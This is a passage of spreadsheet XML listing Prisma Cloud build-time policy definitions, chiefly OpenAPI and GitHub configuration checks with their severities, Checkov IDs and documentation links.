        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-has-vulnerability-alerts-enabled</t>
        </is>
      </c>
      <c r="Y1276" t="inlineStr"/>
      <c r="Z1276" t="inlineStr">
        <is>
          <t>{"category":"Monitoring","resourceTypes":["github_repository"]}</t>
        </is>
      </c>
      <c r="AA1276" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1276" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1276" t="inlineStr">
        <is>
          <t>CKV_GIT_3</t>
        </is>
      </c>
      <c r="AD1276" t="b">
        <v>1</v>
      </c>
      <c r="AE1276" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1276" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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6" t="inlineStr">
        <is>
          <t>51f91ec7-cc58-4c5c-9dfe-7eb5b581685e</t>
        </is>
      </c>
      <c r="AI1276" t="inlineStr"/>
      <c r="AJ1276" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1276" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1277">
      <c r="A1277" t="inlineStr"/>
      <c r="B1277" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1277" s="2" t="inlineStr"/>
      <c r="D1277" t="inlineStr"/>
      <c r="E1277" t="inlineStr"/>
      <c r="F1277" t="inlineStr"/>
      <c r="G1277" t="b">
        <v>1</v>
      </c>
      <c r="H12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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1277" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1277" t="inlineStr">
        <is>
          <t>The path scheme is supports unencrypted HTTP connections</t>
        </is>
      </c>
      <c r="L1277" t="inlineStr"/>
      <c r="M1277" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1277" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1277" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1277" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1277" t="inlineStr"/>
      <c r="R1277" t="inlineStr"/>
      <c r="S1277" t="inlineStr"/>
      <c r="T1277" t="b">
        <v>0</v>
      </c>
      <c r="U1277" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1277" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1277" t="inlineStr">
        <is>
          <t>Ensure that the path scheme does not support unencrypted HTTP connection where all transmissions</t>
        </is>
      </c>
      <c r="X1277" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-7</t>
        </is>
      </c>
      <c r="Y1277" t="inlineStr"/>
      <c r="Z1277" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1277" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1277" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1277" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_7</t>
        </is>
      </c>
      <c r="AD1277" t="b">
        <v>1</v>
      </c>
      <c r="AE1277" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1277" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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7" t="inlineStr">
        <is>
          <t>b9bf2d88-0a21-4411-bcfe-af19049cd35d</t>
        </is>
      </c>
      <c r="AI1277" t="inlineStr"/>
      <c r="AJ1277" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1277" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1278">
      <c r="A1278" t="inlineStr"/>
      <c r="B1278" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1278" s="2" t="inlineStr"/>
      <c r="D1278" t="inlineStr"/>
      <c r="E1278" t="inlineStr"/>
      <c r="F1278" t="inlineStr"/>
      <c r="G1278" t="b">
        <v>1</v>
      </c>
      <c r="H12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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1278" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1278" t="inlineStr">
        <is>
          <t>Security definition uses the deprecated implicit flow on OAuth2</t>
        </is>
      </c>
      <c r="L1278" t="inlineStr"/>
      <c r="M1278" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1278" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1278" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1278" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1278" t="inlineStr"/>
      <c r="R1278" t="inlineStr"/>
      <c r="S1278" t="inlineStr"/>
      <c r="T1278" t="b">
        <v>0</v>
      </c>
      <c r="U1278" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1278" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1278" t="inlineStr">
        <is>
          <t>Ensure no security definition is using implicit flow on OAuth2, which is deprecated - version 2.0 files</t>
        </is>
      </c>
      <c r="X1278" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-12</t>
        </is>
      </c>
      <c r="Y1278" t="inlineStr"/>
      <c r="Z1278" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1278" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1278" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1278" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_12</t>
        </is>
      </c>
      <c r="AD1278" t="b">
        <v>1</v>
      </c>
      <c r="AE1278" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1278" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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8" t="inlineStr">
        <is>
          <t>a19546f2-d7e5-410a-b72c-cc5ad410cee2</t>
        </is>
      </c>
      <c r="AI1278" t="inlineStr"/>
      <c r="AJ1278" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1278" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1279">
      <c r="A1279" t="inlineStr"/>
      <c r="B1279" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1279" s="2" t="inlineStr"/>
      <c r="D1279" t="inlineStr"/>
      <c r="E1279" t="inlineStr"/>
      <c r="F1279" t="inlineStr"/>
      <c r="G1279" t="b">
        <v>1</v>
      </c>
      <c r="H12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79" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1279" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1279" t="inlineStr">
        <is>
          <t>Operation Objects Uses Basic Auth</t>
        </is>
      </c>
      <c r="L1279" t="inlineStr"/>
      <c r="M1279" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1279" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1279" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1279" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1279" t="inlineStr"/>
      <c r="R1279" t="inlineStr"/>
      <c r="S1279" t="inlineStr"/>
      <c r="T1279" t="b">
        <v>0</v>
      </c>
      <c r="U1279" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1279" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1279" t="inlineStr">
        <is>
          <t>Ensure that operation objects do not use basic auth - version 2.0 files</t>
        </is>
      </c>
      <c r="X1279" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-15</t>
        </is>
      </c>
      <c r="Y1279" t="inlineStr"/>
      <c r="Z1279" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1279" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1279" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1279" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_15</t>
        </is>
      </c>
      <c r="AD1279" t="b">
        <v>1</v>
      </c>
      <c r="AE1279" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1279" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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79" t="inlineStr">
        <is>
          <t>e7544d68-6d83-4dbd-a8f2-b569041fb455</t>
        </is>
      </c>
      <c r="AI1279" t="inlineStr"/>
      <c r="AJ1279" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1279" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1280">
      <c r="A1280" t="inlineStr"/>
      <c r="B1280" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1280" s="2" t="inlineStr"/>
      <c r="D1280" t="inlineStr"/>
      <c r="E1280" t="inlineStr"/>
      <c r="F1280" t="inlineStr"/>
      <c r="G1280" t="b">
        <v>1</v>
      </c>
      <c r="H12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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1280" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1280" t="inlineStr">
        <is>
          <t>OpenAPI Security object for operations, if defined, must define a security scheme, otherwise it should be considered an error</t>
        </is>
      </c>
      <c r="L1280" t="inlineStr"/>
      <c r="M1280" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1280" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1280" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1280" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1280" t="inlineStr"/>
      <c r="R1280" t="inlineStr"/>
      <c r="S1280" t="inlineStr"/>
      <c r="T1280" t="b">
        <v>0</v>
      </c>
      <c r="U1280" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1280" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1280" t="inlineStr">
        <is>
          <t>Ensure that security operations is not empty</t>
        </is>
      </c>
      <c r="X1280" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/ensure-that-security-operations-is-not-empty</t>
        </is>
      </c>
      <c r="Y1280" t="inlineStr"/>
      <c r="Z1280" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1280" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1280" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1280" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_5</t>
        </is>
      </c>
      <c r="AD1280" t="b">
        <v>1</v>
      </c>
      <c r="AE1280" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1280" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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0" t="inlineStr">
        <is>
          <t>1cf52c26-0af3-4be8-b9a9-105b8ae8aaf2</t>
        </is>
      </c>
      <c r="AI1280" t="inlineStr"/>
      <c r="AJ1280" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1280" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1281">
      <c r="A1281" t="inlineStr"/>
      <c r="B1281" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1281" s="2" t="inlineStr"/>
      <c r="D1281" t="inlineStr"/>
      <c r="E1281" t="inlineStr"/>
      <c r="F1281" t="inlineStr"/>
      <c r="G1281" t="b">
        <v>1</v>
      </c>
      <c r="H12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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1281" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1281" t="inlineStr">
        <is>
          <t>OAuth2 security definitions includes password flow in OpenAPI 2.0 file</t>
        </is>
      </c>
      <c r="L1281" t="inlineStr"/>
      <c r="M1281" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1281" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1281" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1281" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1281" t="inlineStr"/>
      <c r="R1281" t="inlineStr"/>
      <c r="S1281" t="inlineStr"/>
      <c r="T1281" t="b">
        <v>0</v>
      </c>
      <c r="U1281" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1281" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1281" t="inlineStr">
        <is>
          <t>Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files</t>
        </is>
      </c>
      <c r="X1281" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-10</t>
        </is>
      </c>
      <c r="Y1281" t="inlineStr"/>
      <c r="Z1281" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1281" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1281" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1281" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_10</t>
        </is>
      </c>
      <c r="AD1281" t="b">
        <v>1</v>
      </c>
      <c r="AE1281" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1281" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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1" t="inlineStr">
        <is>
          <t>83894412-ed76-4884-8e47-2e74285d8a60</t>
        </is>
      </c>
      <c r="AI1281" t="inlineStr"/>
      <c r="AJ1281" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1281" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1282">
      <c r="A1282" t="inlineStr"/>
      <c r="B1282" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1282" s="2" t="inlineStr"/>
      <c r="D1282" t="inlineStr"/>
      <c r="E1282" t="inlineStr"/>
      <c r="F1282" t="inlineStr"/>
      <c r="G1282" t="b">
        <v>1</v>
      </c>
      <c r="H12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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1282" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1282" t="inlineStr">
        <is>
          <t>Operation objects do not have the 'produces' field defined for GET operations</t>
        </is>
      </c>
      <c r="L1282" t="inlineStr"/>
      <c r="M1282" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1282" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1282" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1282" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1282" t="inlineStr"/>
      <c r="R1282" t="inlineStr"/>
      <c r="S1282" t="inlineStr"/>
      <c r="T1282" t="b">
        <v>0</v>
      </c>
      <c r="U1282" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1282" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1282" t="inlineStr">
        <is>
          <t>Ensure that operation objects have 'produces' field defined for GET operations - version 2.0 files</t>
        </is>
      </c>
      <c r="X1282" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-16</t>
        </is>
      </c>
      <c r="Y1282" t="inlineStr"/>
      <c r="Z1282" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1282" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1282" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1282" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_16</t>
        </is>
      </c>
      <c r="AD1282" t="b">
        <v>1</v>
      </c>
      <c r="AE1282" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1282" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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2" t="inlineStr">
        <is>
          <t>18509e95-b2ab-458b-9e45-89dfe13ed6f6</t>
        </is>
      </c>
      <c r="AI1282" t="inlineStr"/>
      <c r="AJ1282" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1282" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1283">
      <c r="A1283" t="inlineStr"/>
      <c r="B1283" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1283" s="2" t="inlineStr"/>
      <c r="D1283" t="inlineStr"/>
      <c r="E1283" t="inlineStr"/>
      <c r="F1283" t="inlineStr"/>
      <c r="G1283" t="b">
        <v>1</v>
      </c>
      <c r="H12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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1283" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1283" t="inlineStr">
        <is>
          <t>OAuth2 password flow in security definitions for OpenAPI 2.0 file</t>
        </is>
      </c>
      <c r="L1283" t="inlineStr"/>
      <c r="M1283" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1283" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1283" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1283" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1283" t="inlineStr"/>
      <c r="R1283" t="inlineStr"/>
      <c r="S1283" t="inlineStr"/>
      <c r="T1283" t="b">
        <v>0</v>
      </c>
      <c r="U1283" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1283" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1283" t="inlineStr">
        <is>
          <t>Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files</t>
        </is>
      </c>
      <c r="X1283" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-11</t>
        </is>
      </c>
      <c r="Y1283" t="inlineStr"/>
      <c r="Z1283" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1283" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1283" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1283" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_11</t>
        </is>
      </c>
      <c r="AD1283" t="b">
        <v>1</v>
      </c>
      <c r="AE1283" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1283" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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3" t="inlineStr">
        <is>
          <t>49fa9089-965c-4c2f-a5b9-cb796ba0836a</t>
        </is>
      </c>
      <c r="AI1283" t="inlineStr"/>
      <c r="AJ1283" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1283" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1284">
      <c r="A1284" t="inlineStr"/>
      <c r="B1284" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1284" s="2" t="inlineStr"/>
      <c r="D1284" t="inlineStr"/>
      <c r="E1284" t="inlineStr"/>
      <c r="F1284" t="inlineStr"/>
      <c r="G1284" t="b">
        <v>1</v>
      </c>
      <c r="H12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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1284" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1284" t="inlineStr">
        <is>
          <t>The global security scope is not defined in the securityDefinitions</t>
        </is>
      </c>
      <c r="L1284" t="inlineStr"/>
      <c r="M1284" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1284" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1284" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1284" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1284" t="inlineStr"/>
      <c r="R1284" t="inlineStr"/>
      <c r="S1284" t="inlineStr"/>
      <c r="T1284" t="b">
        <v>0</v>
      </c>
      <c r="U1284" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1284" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1284" t="inlineStr">
        <is>
          <t>Ensure that global security scope is defined in securityDefinitions - version 2.0 files</t>
        </is>
      </c>
      <c r="X1284" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-19</t>
        </is>
      </c>
      <c r="Y1284" t="inlineStr"/>
      <c r="Z1284" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1284" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1284" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1284" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_19</t>
        </is>
      </c>
      <c r="AD1284" t="b">
        <v>1</v>
      </c>
      <c r="AE1284" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1284" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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4" t="inlineStr">
        <is>
          <t>390b7d27-254c-4385-8b9d-d942cf97a87a</t>
        </is>
      </c>
      <c r="AI1284" t="inlineStr"/>
      <c r="AJ1284" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1284" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1285">
      <c r="A1285" t="inlineStr"/>
      <c r="B1285" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1285" s="2" t="inlineStr"/>
      <c r="D1285" t="inlineStr"/>
      <c r="E1285" t="inlineStr"/>
      <c r="F1285" t="inlineStr"/>
      <c r="G1285" t="b">
        <v>1</v>
      </c>
      <c r="H12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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1285" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1285" t="inlineStr">
        <is>
          <t>Global schemes use 'httpa' protocol instead of 'https'</t>
        </is>
      </c>
      <c r="L1285" t="inlineStr"/>
      <c r="M1285" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1285" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1285" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1285" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1285" t="inlineStr"/>
      <c r="R1285" t="inlineStr"/>
      <c r="S1285" t="inlineStr"/>
      <c r="T1285" t="b">
        <v>0</v>
      </c>
      <c r="U1285" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1285" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1285" t="inlineStr">
        <is>
          <t>Ensure that global schemes use 'https' protocol instead of 'http'- version 2.0 files</t>
        </is>
      </c>
      <c r="X1285" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-18</t>
        </is>
      </c>
      <c r="Y1285" t="inlineStr"/>
      <c r="Z1285" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1285" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1285" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1285" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_18</t>
        </is>
      </c>
      <c r="AD1285" t="b">
        <v>1</v>
      </c>
      <c r="AE1285" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1285" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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5" t="inlineStr">
        <is>
          <t>1114331a-28e0-4f3a-bdc8-cf4fe9df19d8</t>
        </is>
      </c>
      <c r="AI1285" t="inlineStr"/>
      <c r="AJ1285" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1285" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1286">
      <c r="A1286" t="inlineStr"/>
      <c r="B1286" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1286" s="2" t="inlineStr"/>
      <c r="D1286" t="inlineStr"/>
      <c r="E1286" t="inlineStr"/>
      <c r="F1286" t="inlineStr"/>
      <c r="G1286" t="b">
        <v>1</v>
      </c>
      <c r="H12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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1286" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1286" t="inlineStr">
        <is>
          <t>Security scopes of operations are not defined in securityDefinition</t>
        </is>
      </c>
      <c r="L1286" t="inlineStr"/>
      <c r="M1286" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1286" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1286" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1286" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1286" t="inlineStr"/>
      <c r="R1286" t="inlineStr"/>
      <c r="S1286" t="inlineStr"/>
      <c r="T1286" t="b">
        <v>0</v>
      </c>
      <c r="U1286" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1286" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1286" t="inlineStr">
        <is>
          <t>Ensure that security scopes of operations are defined in securityDefinitions - version 2.0 files</t>
        </is>
      </c>
      <c r="X1286" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-9</t>
        </is>
      </c>
      <c r="Y1286" t="inlineStr"/>
      <c r="Z1286" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1286" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1286" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1286" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_9</t>
        </is>
      </c>
      <c r="AD1286" t="b">
        <v>1</v>
      </c>
      <c r="AE1286" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1286" t="inlineStr">
